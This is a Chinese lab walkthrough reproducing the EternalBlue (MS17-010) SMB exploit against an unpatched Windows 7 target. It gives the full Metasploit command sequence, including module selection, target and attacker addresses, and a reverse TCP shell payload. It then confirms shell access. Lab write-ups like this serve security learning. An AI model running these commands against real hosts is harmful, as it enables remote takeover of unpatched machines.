永恒之蓝漏洞复现

目录

漏洞介绍

环境

查看win7

msfconsole攻击


漏洞介绍

是一种利用windows系统的SMB协议来获取最高权限的漏洞,不法分子通过永恒之蓝漏洞制作勒索病毒"wannacry",漏洞利用端口"445"

环境

kali 192.168.20.128

靶机 192.168.20.144

靶机为win7系统,且防火墙已经关闭,确定没有补丁,开放445端口。

查看win7

查看Win7的IP

永恒之蓝漏洞复现_第1张图片

查看Win7的端口情况

永恒之蓝漏洞复现_第2张图片

msfconsole攻击

search ms17_010

永恒之蓝漏洞复现_第3张图片

use exploit/windows/smb/ms17_010_eternalblue

show options

永恒之蓝漏洞复现_第4张图片

set rhost 192.168.20.144(靶机地址)

set rport 445

set lhost 192.168.20.128(攻击机地址)

set lport 4444靶机端口

set payload /windows/x64/shell/reverse_tcp(设置模块) 

永恒之蓝漏洞复现_第5张图片

run

永恒之蓝漏洞复现_第6张图片

ipconfig查看IP域Win7的IP相同

永恒之蓝漏洞复现_第7张图片

你可能感兴趣的:(漏洞复现,安全,web安全)